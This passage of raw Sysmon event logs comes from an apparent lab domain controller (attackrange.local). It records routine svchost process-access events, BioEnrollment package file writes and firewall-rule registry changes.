12:02:16.090{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004815Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.090{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000004814Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.075{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Windows\SystemApps\Microsoft.BioEnrollment_cw5n1h2txyewy\microsoft.system.package.metadata\Autogen\JSByteCodeCache_64MD5=1036E3DDDC89A4E68D8A33F3823A180E,SHA256=FB5E512425FC9449316EC95969EBE71E2D576DBAB833D61E2A5B9330FD70EE02,IMPHASH=00000000000000000000000000000000falsetrue 13241300x80000000000000004813Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:16.059{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\MpsSvc\Parameters\AppCs\AppCs\S-1-15-2-19479607-1015771884-3827151630-3301822711-2267158487-4079414233-1230461222S-1-5-21-4055678433-3894535204-3898404691-500v2.26|AppPkgId=S-1-15-2-19479607-1015771884-3827151630-3301822711-2267158487-4079414233-1230461222|LUOwn=S-1-5-21-4055678433-3894535204-3898404691-500|C=S-1-15-3-3845273463-1331427702-1186551195-1148109977|C=S-1-15-3-787448254-1207972858-3558633622-1059886964|C=S-1-15-3-19479607-1015771884-3827151630-3301822711-2267158487-4079414233-1230461222|M=microsoft.bioenrollment_cw5n1h2txyewy|Name=@{Microsoft.BioEnrollment_10.0.14393.0_neutral__cw5n1h2txyewy?ms-resource://Microsoft.BioEnrollment/Resources/AppDisplayName}|Desc=@{Microsoft.BioEnrollment_10.0.14393.0_neutral__cw5n1h2txyewy?ms-resource://Microsoft.BioEnrollment/Resources/AppDisplayName}|D=C:\Windows\SystemApps\Microsoft.BioEnrollment_cw5n1h2txyewy\|PFN=Microsoft.BioEnrollment_10.0.14393.0_neutral__cw5n1h2txyewy| 13241300x80000000000000004812Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:16.059{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{0C282241-BB67-46EF-A14D-6D045E24D38F}v2.26|Action=Block|Active=TRUE|Dir=Out|Name=@{Microsoft.BioEnrollment_10.0.14393.0_neutral__cw5n1h2txyewy?ms-resource://Microsoft.BioEnrollment/Resources/AppDisplayName}|Desc=@{Microsoft.BioEnrollment_10.0.14393.0_neutral__cw5n1h2txyewy?ms-resource://Microsoft.BioEnrollment/Resources/AppDisplayName}|LUOwn=S-1-5-21-4055678433-3894535204-3898404691-500|AppPkgId=S-1-15-2-19479607-1015771884-3827151630-3301822711-2267158487-4079414233-1230461222|EmbedCtxt=@{Microsoft.BioEnrollment_10.0.14393.0_neutral__cw5n1h2txyewy?ms-resource://Microsoft.BioEnrollment/Resources/AppDisplayName}| 13241300x80000000000000004811Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:16.059{266CAFBE-646C-6064-1600-00000000AE01}1584C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{B7C2EDC9-7CD9-421A-925D-EABD93799C51}v2.26|Action=Block|Active=TRUE|Dir=In|Name=@{Microsoft.BioEnrollment_10.0.14393.0_neutral__cw5n1h2txyewy?ms-resource://Microsoft.BioEnrollment/Resources/AppDisplayName}|Desc=@{Microsoft.BioEnrollment_10.0.14393.0_neutral__cw5n1h2txyewy?ms-resource://Microsoft.BioEnrollment/Resources/AppDisplayName}|LUOwn=S-1-5-21-4055678433-3894535204-3898404691-500|AppPkgId=S-1-15-2-19479607-1015771884-3827151630-3301822711-2267158487-4079414233-1230461222|EmbedCtxt=@{Microsoft.BioEnrollment_10.0.14393.0_neutral__cw5n1h2txyewy?ms-resource://Microsoft.BioEnrollment/Resources/AppDisplayName}| 11241100x80000000000000004810Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.044{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.BioEnrollment_cw5n1h2txyewy\Settings\settings.dat2021-03-31 12:02:16.044 23542300x80000000000000004809Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.028{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.BioEnrollment_cw5n1h2txyewy\Settings\settings.datMD5=A8308D2F3DDE0745E8B678BF69A2ECD0,SHA256=7FBB3E503ED8A4A8E5D5FAB601883CBB31D2E06D6B598460E570FB7A763EE555,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000004808Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.012{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004807Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.012{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004806Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.012{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004805Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.012{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004804Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.012{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004803Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.012{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004802Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.012{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004801Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.012{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004800Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.012{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004799Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.012{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004798Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.012{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004797Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.012{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004796Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.012{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004795Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.012{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004794Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.012{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004793Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.012{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004792Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.012{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004791Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:16.012{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004790Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 